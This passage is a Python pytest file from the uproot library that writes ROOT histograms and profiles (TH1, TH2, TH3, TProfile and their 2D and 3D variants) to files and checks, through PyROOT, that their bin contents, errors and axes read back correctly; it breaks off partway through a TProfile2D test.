\end{tikzpicture}
\end{document}
''')
def rectangle_pen_color():
    """pen_color must surface as a \\draw[color=...] option."""
    c = tikz.Canvas()
    c.new_rectangle(center=Point(1, 1), width=1, height=2,
                    pen_color=colors.RED)
    return c.draw()
@testa.is_(expect=r'''
\documentclass[UTF8]{ctexart}
\usepackage[a0paper]{geometry}
\usepackage{tikz}
\pagestyle{empty}
\begin{document}
\begin{tikzpicture}
\fill[color=red] (0.50cm,2.00cm)--(1.50cm,2.00cm)--(1.50cm,0.00cm)--(0.50cm,0.00cm)--cycle;
\end{tikzpicture}
\end{document}
''')
def rectangle_brush_color():
    """An invisible pen plus a brush must emit \\fill instead of \\draw."""
    c = tikz.Canvas()
    c.new_rectangle(center=Point(1, 1), width=1, height=2,
                    pen_color=colors.INVISIBLE,
                    brush_color=colors.RED)
    return c.draw()
@testa.is_(expect=r'''
\documentclass[UTF8]{ctexart}
\usepackage[a0paper]{geometry}
\usepackage{tikz}
\pagestyle{empty}
\begin{document}
\begin{tikzpicture}
\draw[dashed] (0.50cm,2.00cm)--(1.50cm,2.00cm)--(1.50cm,0.00cm)--(0.50cm,0.00cm)--cycle;
\end{tikzpicture}
\end{document}
''')
def rectangle_line_style():
    """line_style must surface as a \\draw[...] option (here: dashed)."""
    c = tikz.Canvas()
    c.new_rectangle(center=Point(1, 1), width=1, height=2,
                    line_style=line_styles.DASHED)
    return c.draw()
@testa.is_(expect=r'''
\documentclass[UTF8]{ctexart}
\usepackage[a0paper]{geometry}
\usepackage{tikz}
\pagestyle{empty}
\begin{document}
\begin{tikzpicture}
\fill[rounded corners=0.15cm,color=red] (0.50cm,2.00cm)--(1.50cm,2.00cm)--(1.50cm,0.00cm)--(0.50cm,0.00cm)--cycle;
\draw[rounded corners=0.15cm] (0.50cm,2.00cm)--(1.50cm,2.00cm)--(1.50cm,0.00cm)--(0.50cm,0.00cm)--cycle;
\end{tikzpicture}
\end{document}
''')
def rectangle_rounded_corners():
    """Pen + brush + rounded corners: expect a \\fill and a \\draw pass."""
    c = tikz.Canvas()
    c.new_rectangle(center=Point(1, 1), width=1, height=2,
                    pen_color=colors.BLACK,
                    brush_color=colors.RED,
                    corner_style=corner_styles.DEFAULT_ROUNDED)
    return c.draw()
@testa.is_(expect=r'''
\documentclass[UTF8]{ctexart}
\usepackage[a0paper]{geometry}
\usepackage{tikz}
\pagestyle{empty}
\begin{document}
\begin{tikzpicture}
\draw (-2.00cm,0.00cm)--(0.00cm,1.50cm)--(2.00cm,0.00cm)--(0.00cm,-1.50cm)--cycle;
\end{tikzpicture}
\end{document}
''')
def draw_diamond():
    """A 4x3 diamond centred on the origin."""
    c = tikz.Canvas()
    c.new_diamond(center=ORIGIN, width=4, height=3)
    return c.draw()
# Run the testa suite when invoked directly.
if __name__ == '__main__':
    testa.main()
| 24.572289
| 114
| 0.683746
| 574
| 4,079
| 4.771777
| 0.111498
| 0.040161
| 0.046002
| 0.043812
| 0.835706
| 0.808324
| 0.808324
| 0.794816
| 0.780212
| 0.778751
| 0
| 0.071468
| 0.121844
| 4,079
| 165
| 115
| 24.721212
| 0.693188
| 0
| 0
| 0.77027
| 0
| 0.060811
| 0.525864
| 0.277274
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054054
| false
| 0
| 0.040541
| 0
| 0.148649
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ce7986caebd775ebe07c34802a26ab3bed42cc00
| 2,055
|
py
|
Python
|
server/tests/main.py
|
maresc-g/thermostat
|
be61b7b36d50b6eabebfc63edce4b78151512971
|
[
"MIT"
] | null | null | null |
server/tests/main.py
|
maresc-g/thermostat
|
be61b7b36d50b6eabebfc63edce4b78151512971
|
[
"MIT"
] | null | null | null |
server/tests/main.py
|
maresc-g/thermostat
|
be61b7b36d50b6eabebfc63edce4b78151512971
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
"""Manual smoke-test script for the thermostat REST API.

Walks the heater-timeslot CRUD endpoints and two settings, printing one
trace line per request.  Requires the server to be listening on
127.0.0.1:8080.

Fix: the base URL and the trace ``print`` line were copy-pasted eleven
times; both are factored into small helpers.  Output is unchanged: GET
responses are printed decoded (``r.json()``), write responses as raw
text, exactly as before.
"""
import requests as req
import json

# Base of every endpoint exercised below.
BASE_URL = 'http://127.0.0.1:8080/v1'


def _show(r):
    """Print one trace line: URL, method, status code and response body."""
    body = r.json() if r.request.method == 'GET' else r.text
    print(f'{r.url} ({r.request.method}) => {r.status_code} : {body}')


def _get(path):
    """GET ``path`` under BASE_URL, trace it, and return the response."""
    r = req.get(BASE_URL + path)
    _show(r)
    return r


def _write(method, path, payload):
    """Send ``payload`` as JSON via ``method`` (req.post / req.put)."""
    r = method(BASE_URL + path, data=json.dumps(payload))
    _show(r)
    return r


# --- heater timeslot CRUD -------------------------------------------------
_get('/heater_timeslot')
_write(req.post, '/heater_timeslot', {
    "target_temperature": 21.47,
    "start_day": 1,
    "start_time": "21:20:45",
    "end_day": 2,
    "end_time": "01:06:00",
})
r = _get('/heater_timeslot')
pk = r.json()[0]["pk"]  # the update below targets the slot just listed
_write(req.put, '/heater_timeslot', {
    "pk": pk,
    "target_temperature": 17.5,
    "start_day": 2,
    "start_time": "01:20:45",
    "end_day": 6,
    "end_time": "22:05:00",
})
_get('/heater_timeslot')

# --- settings -------------------------------------------------------------
_get('/setting/default_temperature')
_write(req.put, '/setting', {"key": "default_temperature", "value": "20"})
_get('/setting/default_temperature')

_get('/setting/holiday_mode_enabled')
_write(req.put, '/setting', {"key": "holiday_mode_enabled", "value": "True"})
_get('/setting/holiday_mode_enabled')
| 33.145161
| 82
| 0.616545
| 356
| 2,055
| 3.460674
| 0.168539
| 0.035714
| 0.071429
| 0.080357
| 0.796266
| 0.796266
| 0.796266
| 0.796266
| 0.796266
| 0.796266
| 0
| 0.087767
| 0.112895
| 2,055
| 61
| 83
| 33.688525
| 0.588042
| 0.010219
| 0
| 0.5
| 0
| 0.229167
| 0.65273
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.041667
| 0
| 0.041667
| 0.229167
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ceb194e0d0573b7a449a4d9241e58cf749ea232f
| 86
|
py
|
Python
|
aoc_cqkh42/year_2020/__init__.py
|
cqkh42/advent-of-code
|
bcf31cf8973a5b6d67492c412dce10df742e04d1
|
[
"MIT"
] | null | null | null |
aoc_cqkh42/year_2020/__init__.py
|
cqkh42/advent-of-code
|
bcf31cf8973a5b6d67492c412dce10df742e04d1
|
[
"MIT"
] | null | null | null |
aoc_cqkh42/year_2020/__init__.py
|
cqkh42/advent-of-code
|
bcf31cf8973a5b6d67492c412dce10df742e04d1
|
[
"MIT"
] | null | null | null |
"""
Solutions for 2020's Advent of Code
"""
# TODO is it tidy?
# TODO is it complete?a
| 17.2
| 35
| 0.674419
| 16
| 86
| 3.625
| 0.8125
| 0.206897
| 0.275862
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.057971
| 0.197674
| 86
| 5
| 36
| 17.2
| 0.782609
| 0.872093
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0.2
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0b5ab38e3f12d77a734e16bacedb3dacf93042b3
| 26,536
|
py
|
Python
|
tests/test_0405-write-a-histogram.py
|
eic/uproot4
|
deb8d88c2643521f372bf5005c51af8926016c7e
|
[
"BSD-3-Clause"
] | 133
|
2020-05-08T21:34:11.000Z
|
2022-03-07T18:12:58.000Z
|
tests/test_0405-write-a-histogram.py
|
eic/uproot4
|
deb8d88c2643521f372bf5005c51af8926016c7e
|
[
"BSD-3-Clause"
] | 269
|
2020-05-13T02:42:24.000Z
|
2022-03-24T20:24:16.000Z
|
tests/test_0405-write-a-histogram.py
|
eic/uproot4
|
deb8d88c2643521f372bf5005c51af8926016c7e
|
[
"BSD-3-Clause"
] | 45
|
2020-05-15T17:48:04.000Z
|
2022-03-18T19:23:07.000Z
|
# BSD 3-Clause License; see https://github.com/scikit-hep/uproot4/blob/main/LICENSE
import os
import numpy as np
import pytest
import skhep_testdata
import uproot
import uproot.writing
ROOT = pytest.importorskip("ROOT")
def test_copy(tmp_path):
    """Round-trip a ROOT-written TH1F through uproot and re-check every bin."""
    original = os.path.join(tmp_path, "original.root")
    newfile = os.path.join(tmp_path, "newfile.root")

    # Fill bins 0..9 (under/overflow included) with 0.0, 1.1, ..., 9.9.
    contents = [1.1 * i for i in range(10)]
    f1 = ROOT.TFile(original, "recreate")
    h1 = ROOT.TH1F("h1", "title", 8, -3.14, 2.71)
    for i, value in enumerate(contents):
        h1.SetBinContent(i, value)
    h1.Write()
    f1.Close()

    with uproot.open(original) as fin:
        h2 = fin["h1"]
    with uproot.recreate(newfile) as fout:
        fout["h1"] = h2

    f3 = ROOT.TFile(newfile)
    h3 = f3.Get("h1")
    for i, value in enumerate(contents):
        assert h3.GetBinContent(i) == pytest.approx(value)
    f3.Close()
def test_from_old(tmp_path):
    """Copy a histogram from a reference file into a new file via uproot."""
    newfile = os.path.join(tmp_path, "newfile.root")
    with uproot.open(skhep_testdata.data_path("uproot-histograms.root")) as fin:
        one = fin["one"]
    with uproot.recreate(newfile) as fout:
        fout["one"] = one

    # Known bin contents of "one" in the reference file (flow bins included).
    expected = [0, 68, 285, 755, 1580, 2296, 2286, 1570, 795, 289, 76, 0]
    f1 = ROOT.TFile(newfile)
    h1 = f1.Get("one")
    for i, count in enumerate(expected):
        assert h1.GetBinContent(i) == count
    f1.Close()
def test_new_name(tmp_path):
    """Writing under a different key stores the histogram under that name."""
    newfile = os.path.join(tmp_path, "newfile.root")
    with uproot.open(skhep_testdata.data_path("uproot-histograms.root")) as fin:
        one = fin["one"]
    with uproot.recreate(newfile) as fout:
        fout["whatever"] = one

    # Same reference contents as test_from_old, read back under the new key.
    expected = [0, 68, 285, 755, 1580, 2296, 2286, 1570, 795, 289, 76, 0]
    f1 = ROOT.TFile(newfile)
    h1 = f1.Get("whatever")
    for i, count in enumerate(expected):
        assert h1.GetBinContent(i) == count
    f1.Close()
@pytest.mark.parametrize("cls", [ROOT.TH1C, ROOT.TH1D, ROOT.TH1F, ROOT.TH1I, ROOT.TH1S])
def test_all_TH1(tmp_path, cls):
original = os.path.join(tmp_path, "original.root")
newfile = os.path.join(tmp_path, "newfile.root")
f1 = ROOT.TFile(original, "recreate")
h1 = cls("h1", "title", 2, -3.14, 2.71)
h1.Fill(-4)
h1.Fill(-3.1)
h1.Fill(-3.1)
h1.Fill(2.7, 5)
h1.Fill(3, 4)
h1.Write()
f1.Close()
with uproot.open(original) as fin:
h2 = fin["h1"]
with uproot.recreate(newfile) as fout:
fout["out"] = h2
f3 = ROOT.TFile(newfile)
h3 = f3.Get("out")
assert h3.GetEntries() == 5
assert h3.GetSumOfWeights() == 7
assert h3.GetBinLowEdge(1) == pytest.approx(-3.14)
assert h3.GetBinWidth(1) == pytest.approx((2.71 - -3.14) / 2)
assert h3.GetBinContent(0) == pytest.approx(1)
assert h3.GetBinContent(1) == pytest.approx(2)
assert h3.GetBinContent(2) == pytest.approx(5)
assert h3.GetBinContent(3) == pytest.approx(4)
assert h3.GetBinError(0) == pytest.approx(1)
assert h3.GetBinError(1) == pytest.approx(1.4142135623730951)
assert h3.GetBinError(2) == pytest.approx(5)
assert h3.GetBinError(3) == pytest.approx(4)
f3.Close()
@pytest.mark.parametrize("cls", [ROOT.TH2C, ROOT.TH2D, ROOT.TH2F, ROOT.TH2I, ROOT.TH2S])
def test_all_TH2(tmp_path, cls):
original = os.path.join(tmp_path, "original.root")
newfile = os.path.join(tmp_path, "newfile.root")
f1 = ROOT.TFile(original, "recreate")
h1 = cls("h1", "title", 2, -3.14, 2.71, 3, -5, 10)
h1.Fill(-4, 9)
h1.Fill(-3.1, 9)
h1.Fill(-3.1, 9)
h1.Fill(2.7, -4, 5)
h1.Fill(3, 9, 4)
h1.Write()
f1.Close()
with uproot.open(original) as fin:
h2 = fin["h1"]
with uproot.recreate(newfile) as fout:
fout["out"] = h2
f3 = ROOT.TFile(newfile)
h3 = f3.Get("out")
assert h3.GetEntries() == 5
assert h3.GetSumOfWeights() == 7
assert h3.GetNbinsX() == 2
assert h3.GetNbinsY() == 3
assert h3.GetXaxis().GetBinLowEdge(1) == pytest.approx(-3.14)
assert h3.GetXaxis().GetBinUpEdge(2) == pytest.approx(2.71)
assert h3.GetYaxis().GetBinLowEdge(1) == pytest.approx(-5)
assert h3.GetYaxis().GetBinUpEdge(3) == pytest.approx(10)
assert [[h3.GetBinContent(i, j) for j in range(5)] for i in range(4)] == [
pytest.approx([0, 0, 0, 1, 0]),
pytest.approx([0, 0, 0, 2, 0]),
pytest.approx([0, 5, 0, 0, 0]),
pytest.approx([0, 0, 0, 4, 0]),
]
f3.Close()
@pytest.mark.parametrize("cls", [ROOT.TH3C, ROOT.TH3D, ROOT.TH3F, ROOT.TH3I, ROOT.TH3S])
def test_all_TH3(tmp_path, cls):
original = os.path.join(tmp_path, "original.root")
newfile = os.path.join(tmp_path, "newfile.root")
f1 = ROOT.TFile(original, "recreate")
h1 = cls("h1", "title", 2, -3.14, 2.71, 3, -5, 10, 1, 100, 200)
h1.Fill(-4, 9, 150)
h1.Fill(-3.1, 9, 150)
h1.Fill(-3.1, 9, 150)
h1.Fill(2.7, -4, 150, 5)
h1.Fill(3, 9, 150, 4)
h1.Write()
f1.Close()
with uproot.open(original) as fin:
h2 = fin["h1"]
with uproot.recreate(newfile) as fout:
fout["out"] = h2
f3 = ROOT.TFile(newfile)
h3 = f3.Get("out")
assert h3.GetEntries() == 5
assert h3.GetSumOfWeights() == 7
assert h3.GetNbinsX() == 2
assert h3.GetNbinsY() == 3
assert h3.GetNbinsZ() == 1
assert h3.GetXaxis().GetBinLowEdge(1) == pytest.approx(-3.14)
assert h3.GetXaxis().GetBinUpEdge(2) == pytest.approx(2.71)
assert h3.GetYaxis().GetBinLowEdge(1) == pytest.approx(-5)
assert h3.GetYaxis().GetBinUpEdge(3) == pytest.approx(10)
assert h3.GetZaxis().GetBinLowEdge(1) == pytest.approx(100)
assert h3.GetZaxis().GetBinUpEdge(1) == pytest.approx(200)
approx = pytest.approx
assert [
[[h3.GetBinContent(i, j, k) for k in range(3)] for j in range(5)]
for i in range(4)
] == [
[[0, 0, 0], approx([0, 0, 0]), [0, 0, 0], approx([0, 1, 0]), [0, 0, 0]],
[[0, 0, 0], approx([0, 0, 0]), [0, 0, 0], approx([0, 2, 0]), [0, 0, 0]],
[[0, 0, 0], approx([0, 5, 0]), [0, 0, 0], approx([0, 0, 0]), [0, 0, 0]],
[[0, 0, 0], approx([0, 0, 0]), [0, 0, 0], approx([0, 4, 0]), [0, 0, 0]],
]
f3.Close()
def test_TProfile(tmp_path):
    """Round-trip a TProfile; the asserted contents are per-bin mean weights."""
    original = os.path.join(tmp_path, "original.root")
    newfile = os.path.join(tmp_path, "newfile.root")

    source = ROOT.TFile(original, "recreate")
    prof = ROOT.TProfile("h1", "title", 2, -3.14, 2.71)
    for x, w in [(-4, 10), (-3.1, 10), (-3.1, 20), (2.7, 20), (3, 20)]:
        prof.Fill(x, w)
    prof.Write()
    source.Close()

    with uproot.open(original) as fin:
        copied = fin["h1"]
    with uproot.recreate(newfile) as fout:
        fout["out"] = copied

    readback = ROOT.TFile(newfile)
    h3 = readback.Get("out")
    assert h3.GetEntries() == 5
    assert h3.GetSumOfWeights() == 35
    assert h3.GetBinLowEdge(1) == pytest.approx(-3.14)
    assert h3.GetBinWidth(1) == pytest.approx((2.71 - -3.14) / 2)
    means = [10, 15, 20, 20]
    spreads = [0, 12.5 ** 0.5, 0, 0]
    for i, (m, s) in enumerate(zip(means, spreads)):
        assert h3.GetBinContent(i) == pytest.approx(m)
        assert h3.GetBinError(i) == pytest.approx(s)
    readback.Close()
def test_TProfile2D(tmp_path):
    # Round-trip a TProfile2D through uproot; asserted bin contents are the
    # per-bin averages of the fill weights, errors their spreads.
    original = os.path.join(tmp_path, "original.root")
    newfile = os.path.join(tmp_path, "newfile.root")
    f1 = ROOT.TFile(original, "recreate")
    h1 = ROOT.TProfile2D("h1", "title", 2, -3.14, 2.71, 3, -5, 10)
    h1.Fill(-4, 9, 10)
    h1.Fill(-3.1, 9, 10)
    h1.Fill(-3.1, 9, 20)
    h1.Fill(2.7, -4, 20)
    h1.Fill(3, 9, 20)
    h1.Write()
    f1.Close()
    with uproot.open(original) as fin:
        h2 = fin["h1"]
    with uproot.recreate(newfile) as fout:
        fout["out"] = h2
    f3 = ROOT.TFile(newfile)
    h3 = f3.Get("out")
    assert h3.GetEntries() == 5
    assert h3.GetSumOfWeights() == 35
    assert h3.GetNbinsX() == 2
    assert h3.GetNbinsY() == 3
    assert h3.GetXaxis().GetBinLowEdge(1) == pytest.approx(-3.14)
    assert h3.GetXaxis().GetBinUpEdge(2) == pytest.approx(2.71)
    assert h3.GetYaxis().GetBinLowEdge(1) == pytest.approx(-5)
    assert h3.GetYaxis().GetBinUpEdge(3) == pytest.approx(10)
    # Grid indexed [x][y] including flow bins.
    assert [[h3.GetBinContent(i, j) for j in range(5)] for i in range(4)] == [
        pytest.approx([0, 0, 0, 10, 0]),
        pytest.approx([0, 0, 0, 15, 0]),
        pytest.approx([0, 20, 0, 0, 0]),
        pytest.approx([0, 0, 0, 20, 0]),
    ]
    assert [[h3.GetBinError(i, j) for j in range(5)] for i in range(4)] == [
        pytest.approx([0, 0, 0, 0, 0]),
        pytest.approx([0, 0, 0, np.sqrt(12.5), 0]),
        pytest.approx([0, 0, 0, 0, 0]),
        pytest.approx([0, 0, 0, 0, 0]),
    ]
    f3.Close()
def test_TProfile3D(tmp_path):
    # Round-trip a TProfile3D (2x3x1 bins) through uproot and verify entries,
    # all three axes, and the full content/error grids read back via ROOT.
    original = os.path.join(tmp_path, "original.root")
    newfile = os.path.join(tmp_path, "newfile.root")
    f1 = ROOT.TFile(original, "recreate")
    h1 = ROOT.TProfile3D("h1", "title", 2, -3.14, 2.71, 3, -5, 10, 1, 100, 200)
    h1.Fill(-4, 9, 150, 10)
    h1.Fill(-3.1, 9, 150, 10)
    h1.Fill(-3.1, 9, 150, 20)
    h1.Fill(2.7, -4, 150, 20)
    h1.Fill(3, 9, 150, 20)
    h1.Write()
    f1.Close()
    with uproot.open(original) as fin:
        h2 = fin["h1"]
    with uproot.recreate(newfile) as fout:
        fout["out"] = h2
    f3 = ROOT.TFile(newfile)
    h3 = f3.Get("out")
    assert h3.GetEntries() == 5
    assert h3.GetSumOfWeights() == 35
    assert h3.GetNbinsX() == 2
    assert h3.GetNbinsY() == 3
    assert h3.GetNbinsZ() == 1
    assert h3.GetXaxis().GetBinLowEdge(1) == pytest.approx(-3.14)
    assert h3.GetXaxis().GetBinUpEdge(2) == pytest.approx(2.71)
    assert h3.GetYaxis().GetBinLowEdge(1) == pytest.approx(-5)
    assert h3.GetYaxis().GetBinUpEdge(3) == pytest.approx(10)
    assert h3.GetZaxis().GetBinLowEdge(1) == pytest.approx(100)
    assert h3.GetZaxis().GetBinUpEdge(1) == pytest.approx(200)
    approx = pytest.approx
    # Grids indexed [x][y][z] with flow bins; contents are mean weights.
    assert [
        [[h3.GetBinContent(i, j, k) for k in range(3)] for j in range(5)]
        for i in range(4)
    ] == [
        [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 10, 0], [0, 0, 0]],
        [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 15, 0], [0, 0, 0]],
        [[0, 0, 0], [0, 20, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]],
        [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 20, 0], [0, 0, 0]],
    ]
    assert [
        [[h3.GetBinError(i, j, k) for k in range(3)] for j in range(5)]
        for i in range(4)
    ] == [
        [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]],
        [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, approx(np.sqrt(12.5)), 0], [0, 0, 0]],
        [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]],
        [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]],
    ]
    f3.Close()
def test_ex_nihilo_TH1(tmp_path):
    """Build a TH1 from raw members with uproot and verify it from ROOT."""
    newfile = os.path.join(tmp_path, "newfile.root")
    h1 = uproot.writing.identify.to_TH1x(
        fName="h1",
        fTitle="title",
        data=np.array([1.0, 2.0, 5.0, 4.0], np.float64),
        fEntries=5.0,
        fTsumw=7.0,
        fTsumw2=27.0,
        fTsumwx=7.3,
        fTsumwx2=55.67,
        fSumw2=np.array([1.0, 2.0, 25.0, 16.0], np.float64),
        fXaxis=uproot.writing.identify.to_TAxis(
            fName="xaxis",
            fTitle="",
            fNbins=2,
            fXmin=-3.14,
            fXmax=2.71,
        ),
    )
    with uproot.recreate(newfile) as fout:
        fout["out"] = h1

    readback = ROOT.TFile(newfile)
    h3 = readback.Get("out")
    assert h3.GetEntries() == 5
    assert h3.GetSumOfWeights() == 7
    assert h3.GetBinLowEdge(1) == pytest.approx(-3.14)
    assert h3.GetBinWidth(1) == pytest.approx((2.71 - -3.14) / 2)
    # Errors are sqrt(fSumw2) per bin.
    for i, (c, e) in enumerate(zip([1, 2, 5, 4], [1, 2 ** 0.5, 5, 4])):
        assert h3.GetBinContent(i) == pytest.approx(c)
        assert h3.GetBinError(i) == pytest.approx(e)
    readback.Close()
def test_ex_nihilo_TH2(tmp_path):
    # Build a TH2 directly from its members (no ROOT involved in writing)
    # and check that ROOT reads back the same axes and bin grid.
    newfile = os.path.join(tmp_path, "newfile.root")
    h1 = uproot.writing.identify.to_TH2x(
        fName="h1",
        fTitle="title",
        # Flattened 4x5 grid (flow bins included), y-major within x.
        data=np.array(
            [0, 0, 0, 0, 0, 0, 5, 0, 0, 0, 0, 0, 1, 2, 0, 4, 0, 0, 0, 0], np.float64
        ),
        fEntries=5.0,
        fTsumw=7.0,
        fTsumw2=27.0,
        fTsumwx=7.3,
        fTsumwx2=55.67,
        fTsumwy=-2.0,
        fTsumwy2=242.0,
        fTsumwxy=-109.8,
        fSumw2=np.array(
            [0, 0, 0, 0, 0, 0, 25, 0, 0, 0, 0, 0, 1, 2, 0, 16, 0, 0, 0, 0], np.float64
        ),
        fXaxis=uproot.writing.identify.to_TAxis(
            fName="xaxis",
            fTitle="",
            fNbins=2,
            fXmin=-3.14,
            fXmax=2.71,
        ),
        fYaxis=uproot.writing.identify.to_TAxis(
            fName="yaxis",
            fTitle="",
            fNbins=3,
            fXmin=-5.0,
            fXmax=10.0,
        ),
    )
    with uproot.recreate(newfile) as fout:
        fout["out"] = h1
    f3 = ROOT.TFile(newfile)
    h3 = f3.Get("out")
    assert h3.GetEntries() == 5
    assert h3.GetSumOfWeights() == 7
    assert h3.GetNbinsX() == 2
    assert h3.GetNbinsY() == 3
    assert h3.GetXaxis().GetBinLowEdge(1) == pytest.approx(-3.14)
    assert h3.GetXaxis().GetBinUpEdge(2) == pytest.approx(2.71)
    assert h3.GetYaxis().GetBinLowEdge(1) == pytest.approx(-5)
    assert h3.GetYaxis().GetBinUpEdge(3) == pytest.approx(10)
    assert [[h3.GetBinContent(i, j) for j in range(5)] for i in range(4)] == [
        pytest.approx([0, 0, 0, 1, 0]),
        pytest.approx([0, 0, 0, 2, 0]),
        pytest.approx([0, 5, 0, 0, 0]),
        pytest.approx([0, 0, 0, 4, 0]),
    ]
    f3.Close()
def test_ex_nihilo_TH3(tmp_path):
    # Build a TH3 directly from its members and verify axes and the full
    # [x][y][z] bin grid after reading the file back with ROOT.
    newfile = os.path.join(tmp_path, "newfile.root")
    h1 = uproot.writing.identify.to_TH3x(
        fName="h1",
        fTitle="title",
        # Flattened 4x5x3 grid (flow bins included), one 20-element z-slab
        # per line; only the middle z bin holds content.
        data=np.array(
            [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
            + [0, 0, 0, 0, 0, 0, 5, 0, 0, 0, 0, 0, 1, 2, 0, 4, 0, 0, 0, 0]
            + [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
            np.float64,
        ),
        fEntries=5.0,
        fTsumw=7.0,
        fTsumw2=27.0,
        fTsumwx=7.3,
        fTsumwx2=55.67,
        fTsumwy=-2.0,
        fTsumwy2=242.0,
        fTsumwxy=-109.8,
        fTsumwz=1050.0,
        fTsumwz2=157500.0,
        fTsumwxz=1095.0,
        fTsumwyz=-300.0,
        fSumw2=np.array(
            [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
            + [0, 0, 0, 0, 0, 0, 25, 0, 0, 0, 0, 0, 1, 2, 0, 16, 0, 0, 0, 0]
            + [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
            np.float64,
        ),
        fXaxis=uproot.writing.identify.to_TAxis(
            fName="xaxis",
            fTitle="",
            fNbins=2,
            fXmin=-3.14,
            fXmax=2.71,
        ),
        fYaxis=uproot.writing.identify.to_TAxis(
            fName="yaxis",
            fTitle="",
            fNbins=3,
            fXmin=-5.0,
            fXmax=10.0,
        ),
        fZaxis=uproot.writing.identify.to_TAxis(
            fName="zaxis",
            fTitle="",
            fNbins=1,
            fXmin=100.0,
            fXmax=200.0,
        ),
    )
    with uproot.recreate(newfile) as fout:
        fout["out"] = h1
    f3 = ROOT.TFile(newfile)
    h3 = f3.Get("out")
    assert h3.GetEntries() == 5
    assert h3.GetSumOfWeights() == 7
    assert h3.GetNbinsX() == 2
    assert h3.GetNbinsY() == 3
    assert h3.GetNbinsZ() == 1
    assert h3.GetXaxis().GetBinLowEdge(1) == pytest.approx(-3.14)
    assert h3.GetXaxis().GetBinUpEdge(2) == pytest.approx(2.71)
    assert h3.GetYaxis().GetBinLowEdge(1) == pytest.approx(-5)
    assert h3.GetYaxis().GetBinUpEdge(3) == pytest.approx(10)
    assert h3.GetZaxis().GetBinLowEdge(1) == pytest.approx(100)
    assert h3.GetZaxis().GetBinUpEdge(1) == pytest.approx(200)
    approx = pytest.approx
    assert [
        [[h3.GetBinContent(i, j, k) for k in range(3)] for j in range(5)]
        for i in range(4)
    ] == [
        [[0, 0, 0], approx([0, 0, 0]), [0, 0, 0], approx([0, 1, 0]), [0, 0, 0]],
        [[0, 0, 0], approx([0, 0, 0]), [0, 0, 0], approx([0, 2, 0]), [0, 0, 0]],
        [[0, 0, 0], approx([0, 5, 0]), [0, 0, 0], approx([0, 0, 0]), [0, 0, 0]],
        [[0, 0, 0], approx([0, 0, 0]), [0, 0, 0], approx([0, 4, 0]), [0, 0, 0]],
    ]
    f3.Close()
def test_ex_nihilo_TProfile(tmp_path):
    """Build a TProfile from raw members with uproot and verify it from ROOT."""
    newfile = os.path.join(tmp_path, "newfile.root")
    h1 = uproot.writing.identify.to_TProfile(
        fName="h1",
        fTitle="title",
        data=np.array([10, 30, 20, 20], np.float64),
        fEntries=5.0,
        fTsumw=3.0,
        fTsumw2=3.0,
        fTsumwx=-3.5,
        fTsumwx2=26.51,
        fTsumwy=50.0,
        fTsumwy2=900.0,
        fSumw2=np.array([100, 500, 400, 400], np.float64),
        fBinEntries=np.array([1, 2, 1, 1], np.float64),
        fBinSumw2=np.array([], np.float64),
        fXaxis=uproot.writing.identify.to_TAxis(
            fName="xaxis",
            fTitle="",
            fNbins=2,
            fXmin=-3.14,
            fXmax=2.71,
        ),
    )
    with uproot.recreate(newfile) as fout:
        fout["out"] = h1

    readback = ROOT.TFile(newfile)
    h3 = readback.Get("out")
    assert h3.GetEntries() == 5
    assert h3.GetSumOfWeights() == 35
    assert h3.GetBinLowEdge(1) == pytest.approx(-3.14)
    assert h3.GetBinWidth(1) == pytest.approx((2.71 - -3.14) / 2)
    # Bin contents are data/fBinEntries; errors are the per-bin spreads.
    means = [10, 15, 20, 20]
    spreads = [0, 12.5 ** 0.5, 0, 0]
    for i, (m, s) in enumerate(zip(means, spreads)):
        assert h3.GetBinContent(i) == pytest.approx(m)
        assert h3.GetBinError(i) == pytest.approx(s)
    readback.Close()
def test_ex_nihilo_TProfile2D(tmp_path):
    # Build a TProfile2D directly from its members and verify the averaged
    # bin contents and errors after reading the file back with ROOT.
    newfile = os.path.join(tmp_path, "newfile.root")
    h1 = uproot.writing.identify.to_TProfile2D(
        fName="h1",
        fTitle="title",
        # Flattened 4x5 grid of weight sums (flow bins included).
        data=np.array(
            [0, 0, 0, 0, 0, 0, 20, 0, 0, 0, 0, 0, 10, 30, 0, 20, 0, 0, 0, 0], np.float64
        ),
        fEntries=5.0,
        fTsumw=3.0,
        fTsumw2=3.0,
